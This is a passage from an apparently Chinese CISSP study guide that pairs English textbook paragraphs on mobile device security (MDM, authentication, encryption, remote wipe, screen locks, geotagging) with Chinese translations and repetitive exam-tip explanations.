恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 68 / PDF P611

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Android and iOS Two of the most widely used device OSs are Android and iOS. Android Android is a mobile device OS based on Linux, which was acquired by Google in 2005. The Android source code is made open source through the Apache license, but most Android devices also include proprietary software. Although it's mostly intended for use on phones and tablets, Android is being used on a wide range of devices, including televisions, game consoles, digital cameras, microwaves, watches, e-readers, cordless phones, and ski goggles.

The use of Android in phones and tablets allows for a wide range of user customization: you can install Google Play Store apps as well as apps from unknown external sources (such as the Amazon Appstore), and many devices support the replacement of the default version of Android with a customized or alternate version. However, when Android is used on other devices, it can be implemented as something closer to a static system. Whether static or not, Android has numerous security vulnerabilities. These include exposure to malicious apps, running scripts from malicious websites, and allowing insecure data transmissions. Improvements are made to Android security as new updates are released.

Users can adjust numerous configuration settings to reduce vulnerabilities and risks. Also, users may be able to install apps that add additional security features to the platform. Security-Enhanced Android (SEAndroid) is a security improvement for Android. SEAndroid is a framework to integrate elements of SecurityEnhanced Linux into Android devices.

These improvements include adding support for mandatory access control (MAC) and middleware mandatory access control (MMAC), reducing privilege daemon vulnerabilities, sandboxing and isolating apps, blocking app privilege escalation, enabling app privilege adjustments both during installation and at runtime, and defining a centralized security policy that can be scrutinized. Android

中文直译 / 整理

和 iOS 两种最广泛使用的设备操作系统是 Android 和 iOS。 Android Android 是一种基于 Linux 的移动设备操作系统,于 2005 年被 Google 收购。 Android 源代码通过 Apache 许可证开源,但大多数 Android 设 备也包含专有软件。 尽管它主要设计用于手机和平板电脑,但 Android 目 前已广泛应用于各种设备,包括电视、游戏机、数码相机、微波炉、手表、 电子阅读器、无绳电话和滑雪护目镜。 Android 在手机和平板电脑上的使用允许广泛的用户自定义:您可以安 装 Google Play 商店的应用程序,以及来自未知外部来源的应用程序 (例如 Amazon 应用商店),许多设备还支持将默认的 Android 版本替 换为自定义或替代版本。 然而,当 Android 用于其他设备时,它可以实 现为更接近静态系统的形态。 无论是否为静态系统,Android 都存在众多安全漏洞,包括遭受恶意应用 程序攻击、运行来自恶意网站的脚本,以及允许不安全的数据传输。 随着新更新的发布,Android 安全性得到了改进。 用户可以调整大量配置 设置以减少漏洞和风险。

此外,用户可能能够安装为平台添加额外安全功 能的应用程序。 安全增强型Android(SEAndroid)是Android的安全改进方案。 SEAndroid是一个将安全增强型Linux的组件集成到Android设备中的 框架。 这些改进包括支持强制访问控制(MAC)和中间件强制访问控制 (MMAC)、减少特权守护进程的漏洞、沙箱化和隔离应用、阻止应用 权限提升、在安装时和运行时启用应用权限调整,以及定义可审查的集中 式安全策略。

小白解释

场景先行:你是公司的安全负责人,正在读第 611 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 69 / PDF P612

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

iOS iOS is the mobile device OS from Apple that is standard on the iPhone. iOS isn't licensed for use on any non-Apple hardware. Thus, Apple is in full control of the features and capabilities of iOS. However, iOS is not really an example of a static environment, because users can install apps from the Apple App Store (although it can be argued that iOS is a static OS). Mobile Device Security Features A wide range of security features may be available on mobile devices, such as portable computers, tablets, and smartphones. Not all mobile devices have good security features. Be sure to consider the security options of a new device before you make a purchase decision.

But even if security features are available, they're of no value unless they're enabled and properly configured. A security benefit is gained only when the security function is in force. Be sure to check that all desired security features are operating as expected on any device allowed to connect to the organization's network or enter the organization's facility. The following sections discuss various examples of on-device security features that are often present on or available for mobile devices. Mobile Device Management Administrators register employee devices with a mobile device management system.

Mobile device management (MDM) is a software solution to the challenging task of managing the myriad mobile devices that employees use to access company resources. The MDM system monitors and manages mobile devices and ensures that they are kept up-to-date. The goals of MDM are to improve security, provide monitoring, enable remote management, and support troubleshooting. Many MDM solutions support a wide range of devices and can operate across many service providers. You can use MDM to push or remove apps, manage data, and enforce configuration settings both over the air (across a carrier network) and over Wi-Fi connections.

MDM can be used to manage company-owned devices as well as personally owned devices. Unified endpoint management (UEM) is a type of software tool that provides a single management platform to control mobile, PC, IoT, wearables, ICS, and iOS iOS

中文直译 / 整理

是Apple为iPhone提供的移动设备操作系统。 iOS不允许在任何非 Apple硬件上使用。 因此,Apple完全掌控iOS的功能和特性。 然而, iOS并非真正的静态环境示例,因为用户可以从Apple应用商店安装应用 (尽管有人认为iOS是一种静态操作系统)。 移动设备安全功能 移动设备(如便携式计算机、平板电脑和智能手机)可能具备多种安全功能。 但并非所有移动设备都具有良好的安全功能。 在做出购买决策之前,请务必考 虑新设备的安全选项。 但即使安全功能可用,若未启用或未正确配置,也毫无 价值。 只有当安全功能处于启用状态时,才能获得安全效益。 请确保在任何允 许连接到组织网络或进入组织设施的设备上,所有所需的安全功能均能正常运 行。 以下部分将讨论常存在于移动设备上或可供移动设备使用的各种设备端安 全功能示例。 移动设备管理 管理员将员工设备注册到移动设备管理系统中。 移动设备管理(MDM)是一种 软件解决方案,用于应对管理员管理员工用于访问公司资源的众多移动设备这 一复杂任务。 MDM系统监控和管理移动设备,并确保其保持最新状态。 MDM的目标是提升安全性、提供监控、支持远程管理并协助故障排除。

许多 MDM解决方案支持多种设备,并可在多个服务提供商网络中运行。 您可以通 过MDM通过空中(跨运营商网络)或Wi‑Fi连接推送或移除应用程序、管理数 据以及强制执行配置设置。 MDM可用于管理公司拥有的设备以及员工个人拥 有的设备。 统一端点管理(UEM) 是一种软件工具,提供单一管理平台来控制移动设备、 PC、物联网、可穿戴设备、工业控制系统和

小白解释

场景先行:你是公司的安全负责人,正在读第 612 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 70 / PDF P613

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

other devices. UEM is intended to replace MDM and enterprise mobility management (EMM) products by combining the features of numerous products into one solution. Device Authentication Authentication on or to a mobile device is often fairly simple, especially for mobile phones and tablets. This is known as device authentication. However, a swipe or pattern access shouldn't be considered true authentication. Whenever possible, use a password, provide a personal identification number (PIN), offer your eyeball or face for recognition, scan your fingerprint, provide a USB key, or use a proximity device such as a near-field communication (NFC) or radio-frequency identification (RFID) ring or tile.

These means of device authentication are much more difficult for a thief to bypass if properly implemented. It's also prudent to combine device authentication with device encryption to block access to stored information via a connection cable. Retina-, iris-, face-, and fingerprint-based authentication are all examples of biometrics. See Chapter 13, “Managing Identity and Authentication,” for the full discussion of biometrics or the “something you are” authentication factor. A strong password would be a great idea on a phone or other mobile device if locking the phone provided true security.

But most mobile devices aren't that secure, so even with a strong password, the device may still be accessible over Bluetooth, wireless, or a USB cable. If a specific mobile device blocked access to the device when the system lock was enabled, this would be a worthwhile feature to set to trigger automatically after a period of inactivity or manual initialization (often related to screen lock). This benefit is usually obtained when you enable both a device password and storage encryption.

中文直译 / 整理

其他设备。 UEM 旨在通过将多种产品的功能整合到一个解决方案中,取 代移动设备管理(MDM)和企业移动管理(EMM)产品。 设备认证 对移动设备进行认证通常相当简单,尤其是对于手机和平板电脑。 这被称为设 备认证。 然而,滑动或图案解锁不应被视为真正的认证。 在可能的情况下,请 使用密码、提供个人识别码(PIN)、出示您的眼睛或面部进行识别、扫描指 纹、提供USB密钥,或使用近场通信(NFC)或射频识别(RFID)戒指或标 签等近距设备。 这些设备认证方式在正确实施时,对窃贼而言要绕过困难得多。 同时,建议将设备认证与设备加密结合使用,以通过连接电缆阻止对存储信息 的访问。 视网膜、虹膜、面部和指纹认证都是生物识别技术的例子。 请参阅第 13章“管理身份和认证”,以全面了解生物识别技术或“你是谁”这一认 证因素。 如果锁定手机能提供真正的安全性,那么在手机或其他移动设备上设置一个强 密码将是一个好主意。 但大多数移动设备并不够安全,因此即使设置了强密码, 设备仍可能通过蓝牙、无线网络或USB电缆被访问。

如果某个特定移动设备在 系统锁定启用时阻止了对设备的访问,那么将此功能设置为在一段时间不活动 或手动初始化后自动触发(通常与屏幕锁定相关)将是值得的。 当您同时启用 设备密码和存储加密时,通常可以获得这一好处。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
身份 身份是主体在系统中的标识。
学习单元 71 / PDF P614

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

When accessing an online website, service, or cloud offering from a mobile device, a form of multifactor authentication (MFA) may be implemented by combining your user credentials with context-aware authentication. Context-aware authentication evaluates the origin and context of a user's attempt to access a system. If the user originates from a known trusted system, such as a system inside the company facility or the same personal mobile device, then a low-risk context is present and a modest level of authentication is mandated for gaining access. If the context and origin of the user is from an unknown device and/or external/unknown location, the context is high risk.

The authentication system will then demand that the user traverse a more complex multifactor authentication gauntlet to gain access. Context-aware authentication is thus an adaptive authentication that may be able to reduce the burden of authentication during low-risk scenarios but thwart impersonation attempts during high-risk scenarios. Full-Device Encryption Some mobile devices, including portable computers, tablets, and mobile phones, may offer full-device encryption (FDE). Many mobile devices are either pre-encrypted or can be encrypted by the user/owner.

Once a mobile device is encrypted, the user's data is protected whenever the screen is locked, which causes the physical data port on the device to be deactivated. This prevents unauthorized access to data on the device through a physical cable connection as long as the screen remains locked. If most or all of the storage media of a device can be encrypted, this is usually a worthwhile feature to enable. However, encryption isn't a guarantee of protection for data, especially if the device is stolen while unlocked or if the system itself has a known backdoor attack vulnerability.

Communication Protection Voice encryption may be possible on mobile devices when Voice over Internet Protocol (VoIP) services are used. VoIP service between computer-like devices is more likely to offer an encryption option than VoIP connections to a traditional landline phone or typical mobile phone. When a voice conversation is encrypted, attempting to listen in on the communications

中文直译 / 整理

当从移动设备访问在线网站、服务或云产品时,可以通过将您的用户凭 据与上下文感知认证相结合来实现多因素认证(MFA)。 上下文感知认证会 评估用户尝试访问系统时的来源和上下文。 如果用户来自已知的可信系统, 例如公司设施内部的系统或同一台个人移动设备,则属于低风险上下文,此 时只需较低级别的认证即可获得访问权限。 如果用户的上下文和来源来自未 知设备和/或外部/未知位置,则属于高风险上下文。 此时,认证系统将要求 用户通过更复杂的多因素认证流程才能获得访问权限。 因此,上下文感知认 证是一种自适应认证,能够在低风险场景中减轻认证负担,同时在高风险场 景中阻止冒名顶替行为。 全设备加密 某些移动设备,包括便携式计算机、平板电脑和手机,可能提供全设备加密 (FDE)。 许多移动设备要么预加密,要么可由用户/所有者进行加密。 一旦移 动设备被加密,当屏幕锁定时,用户的资料就会受到保护,这会导致设备上的 物理数据端口失效。 只要屏幕保持锁定状态,就可以防止通过物理电缆连接未 经授权访问设备上的数据。 如果设备的大部分或全部存储介质都可以加密,这通常是一个值得启用的功能。

然而,加密并不能保证数据的安全,尤其是在设备在未锁定状态下被盗,或系 统本身存在已知的后门攻击漏洞时。 通信保护 当使用互联网语音协议(VoIP)服务时,移动设备上可能实现语音加密。 计算 机类设备之间的VoIP服务比VoIP连接到传统固话或典型手机更有可能提供加密 选项。 当语音通话被加密时,试图窃听通信

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

多因素认证:MFA 使用至少两类不同认证因素,提高认证可信度。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
学习单元 72 / PDF P615

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

becomes almost worthless because the contents of the conversation are undecipherable. This concept of communication protection should be applied to any type of transmission, whether video, text, or data. There are numerous apps that provide encrypted communications, many using standard and well-respected cryptography solutions, such as the Signal protocol (see Chapters 6 and 7 for more on encryption). Remote Wiping Remote wipe or remote sanitization is to be performed if a device is lost or stolen. A remote wipe lets you delete all data and possibly even configuration settings from a device remotely.

The wipe process can be triggered over mobile phone service or sometimes over any Internet connection (such as Wi-Fi). However, a remote wipe isn't a guarantee of data security. The wiping trigger signal might not be received by the device. Thieves may be smart enough to prevent connections that would trigger the wipe function while they dump out the data. This could be accomplished by removing the subscriber identity module (SIM) card, deactivating Wi-Fi, and/or placing the device in a Faraday cage. Additionally, a remote wipe is mostly a deletion operation and resetting the device back to factory conditions.

The use of an undelete or data recovery utility can often recover data on a wiped device. To ensure that a remote wipe destroys data beyond recovery, the device should be encrypted (aka fulldevice encryption [FDE]). Thus, the undelete operation would only be recovering encrypted data, which the attacker should be unable to decipher. Screen Locks A screen lock is designed to prevent someone from casually picking up and being able to use your phone or mobile device. However, most screen locks can be unlocked by swiping across the screen or drawing a pattern. Neither of these is truly a secure operation.

These easy-bypass options may be the default on the device but should be changed to something more secure and resistive of unauthorized access, such as a PIN, password, or biometric. Screen locks may have workarounds on some devices, such as accessing the phone application through the emergency calling feature. And a screen lock doesn't necessarily protect the device if a malicious actor connects to it over Bluetooth, wireless, or a USB cable.

中文直译 / 整理

将几乎毫无价值,因为通话内容无法解密。 这种通信保护概念应适用于任何类型的传输,无论是视频、文本还是数据。 有 许多应用程序提供加密通信,其中许多使用标准且备受推崇的加密解决方案, 例如Signal协议(详见第6章和第7章关于加密的更多内容)。 远程擦除 远程擦除或远程清理应在设备丢失或被盗时执行。 远程擦除允许您远程删除设 备上的所有数据,甚至可能删除配置设置。 擦除过程可以通过移动电话服务触 发,有时也可以通过任何互联网连接(如Wi‑Fi)触发。 然而,远程擦除并不 能保证数据安全。 设备可能无法接收到擦除触发信号。 窃贼可能足够聪明,能 够在窃取数据时阻止触发擦除功能的连接。 这可以通过移除用户身份模块( SIM)卡、停用Wi‑Fi和/或将设备放入法拉第笼来实现。 此外,远程擦除主要是一种删除操作,并将设备重置为出厂状态。 使用 undelete或数据恢复工具通常可以恢复已被擦除设备上的数据。 为确保远程擦 除彻底销毁数据使其无法恢复,设备应进行加密(即全设备加密 [FDE])。 因 此,undelete操作只能恢复加密数据,而攻击者应无法解密这些数据。

屏幕锁定 一个屏幕锁定旨在防止他人随意拿起并使用您的手机或移动设备。 然而,大多 数屏幕锁定可以通过滑动屏幕或绘制图案来解锁。 这两种方式都不是真正安全 的操作。 这些易于绕过的选项可能是设备的默认设置,但应更改为更安全、更 能抵抗未经授权访问的方式,例如PIN码、密码或生物识别。 某些设备上的屏幕锁定可能存在绕过方法,例如通过紧急呼叫功能访问电话 应用。 如果恶意攻击者通过蓝牙、无线或USB电缆连接到设备,屏幕锁定也 不一定能保护设备。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
身份 身份是主体在系统中的标识。
学习单元 73 / PDF P616

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Screen locks are often triggered after a timeout period of nonuse. Most devices can be configured to auto-trigger a password-protected screen lock if the system is left idle for a few minutes. Similarly, many tablets and mobile phones can be set to trigger a screen lock and dim or turn off the display after a set time period, such as 30 seconds. The lockout feature ensures that if you leave your device unattended or it's lost or stolen, it will be difficult for anyone else to be able to access your data or applications. To unlock the device, you must enter valid credentials. Device Lockout Lockout on a mobile device is similar to account lockout on a company workstation.

When a user fails to provide their credentials after repeated attempts, the account or device is deactivated (i.e., locked out) for a period of time or until an administrator clears the lockout flag. Mobile devices may offer a device lockout feature, but it's only effective if a screen lock has been configured. Otherwise, a simple screen swipe to access the device doesn't provide sufficient security, because an authentication process doesn't occur. Some devices trigger ever longer delays between access attempts as a greater number of authentication failures occur. Some devices allow for a set number of attempts (such as three) before triggering a lockout that lasts minutes or hours.

Other devices trigger a persistent lockout and require the use of a different account or master password/code to regain access to the device. Some devices may even have a maximum number of logon attempts (such as 10), before securely wiping all data on the device and resetting back to factory settings. Be sure to know the exact nature of a device's lockout mechanism before attempting to guess credentials; otherwise you might inadvertently trigger a security wipe. GPS and Location Services The Global Positioning System (GPS) is a satellite-based geographical location service.

Many mobile devices include a GPS chip to support and benefit from localized services, such as navigation, so it's possible to track those devices. The GPS chip itself is usually just a receiver of signals from orbiting GPS satellites. However, applications on the mobile device can record the GPS location of the device and then report it to an online service. You can use GPS tracking to monitor your own movements, track the movements of others (such as minors or delivery personnel), or track down a stolen device. But for GPS tracking to work, the mobile device must have Internet or

中文直译 / 整理

屏幕锁定通常在一段时间未使用后触发。 大多数设备可以配置为:如果系统空 闲几分钟后,自动触发密码保护的屏幕锁定。 类似地,许多平板电脑和手机可 以设置为在设定时间(例如30秒)后触发屏幕锁定,并使显示屏变暗或关闭。 锁定功能可确保如果您将设备遗忘在原地或设备丢失或被盗,他人将难以访问 您的数据或应用程序。 要解锁设备,您必须输入有效的凭据。 设备锁定 锁定在移动设备上的作用类似于公司工作站上的账户锁定。 当用户在多次尝试 后仍无法提供其凭据时,账户或设备将被停用(即锁定),持续一段时间,或 直到管理员清除锁定标志。 移动设备可能提供设备锁定功能,但只有在配置了屏幕锁定的情况下才有效。 否则,仅通过简单的屏幕滑动即可访问设备,无法提供足够的安全性,因为未 发生身份验证过程。 一些设备会在身份验证失败次数增加时,逐渐延长每次访 问尝试之间的延迟时间。 一些设备允许设定一定次数的尝试(例如三次),之 后触发持续数分钟或数小时的锁定。 其他设备则触发永久性锁定,需要使用其 他账户或主密码/代码才能重新访问设备。 某些设备甚至在达到最大登录尝试次 数(例如十次)后,会安全擦除设备上的所有数据并恢复为出厂设置。

在尝试 猜测凭据之前,请务必了解设备锁定机制的确切性质; 否则,您可能意外触发 安全擦除。 GPS 和位置服务 全球定位系统(GPS)是一种基于卫星的地理定位服务。 许多移动设备都内置 了GPS芯片,以支持和利用本地化服务,例如导航,从而能够追踪这些设备。 GPS芯片本身通常只是接收环绕地球运行的GPS卫星信号的接收器。 然而,移 动设备上的应用程序可以记录设备的GPS位置,并将其报告给在线服务。 您可 以使用GPS追踪来监控自己的活动、追踪他人的活动(如未成年人或配送人员), 或查找被盗设备。 但要使GPS追踪正常工作,移动设备必须具备互联网或

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 74 / PDF P617

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

wireless phone service over which to communicate its location information. Apps are able to provide location-based services as well as reveal the location of the device (and thus its user/owner) to third parties (sometimes without consent). This risk needs to be evaluated in regard to the organizational security policy and relative location-based risks. Geolocation data is commonly used in navigation tools, authentication services, and many location-based services, such as offering discounts or coupons to nearby retail stores. Location-based authorization policies for controlling access can be used to grant or deny resource access based on where the subject is located.

This might be based on whether the network connection is local wired, local wireless, or remote. Location-based policies can also grant or deny access based on MAC address, IP address, OS version, patch level, and/or subnet in addition to logical or geographical location, which is a feature of both network access control (NAC) (see Chapter 11) and context-aware authentication. Location-based policies should be used only in addition to standard authentication processes, not as a replacement for them. Geotagging is the ability of a mobile device to include details about its location in any media created by the device, such as photos, videos, and social media posts.

Mobile devices with location services enable embedding geographical location in the form of latitude and longitude as well as date/time information into media created on the device. This allows an adversary (or angry ex) to view photos from social networking or similar sites and determine exactly when and where a photo was taken. Geotagging can be used for nefarious purposes, such as determining when a person normally performs routine activities. Once a geotagged photo has been uploaded to the Internet, a potential cyber stalker may have access to more information than the uploader intended. This is prime material for security-awareness briefs for end users.

中文直译 / 整理

无线电话服务,以便传输其位置信息。 应用程序不仅能提供基于位置的服务, 还能将设备(及其用户/所有者)的位置信息透露给第三方(有时未经同意)。 这种风险需要根据组织的安全策略和相关的基于位置的风险进行评估。 地理位置数据常用于导航工具、身份验证服务和许多基于位置的服务,例 如向附近的零售商店提供折扣或优惠券。 基于位置的授权策略可用于根据主体所在位置授予或拒绝资源访问权限。 这可 能基于网络连接是本地有线、本地无线还是远程。 除了逻辑或地理位置外,基 于位置的策略还可以根据MAC地址、IP地址、操作系统版本、补丁级别和/或子 网来授予或拒绝访问,这是网络访问控制(NAC)(见第11章)和上下文感知 身份验证的功能。 基于位置的策略应仅作为标准身份验证过程的补充使用,而 不能替代它们。 地理标记是指移动设备能够在设备创建的任何媒体(如照片、视频和社交媒体 帖子)中包含其位置信息的能力。 启用位置服务的移动设备可以将地理坐标 (纬度和经度)以及日期/时间信息嵌入到设备创建的媒体中。 这使得攻击者 (或愤怒的前伴侣)能够查看来自社交网络或类似网站的照片,并精确确定照 片拍摄的时间和地点。

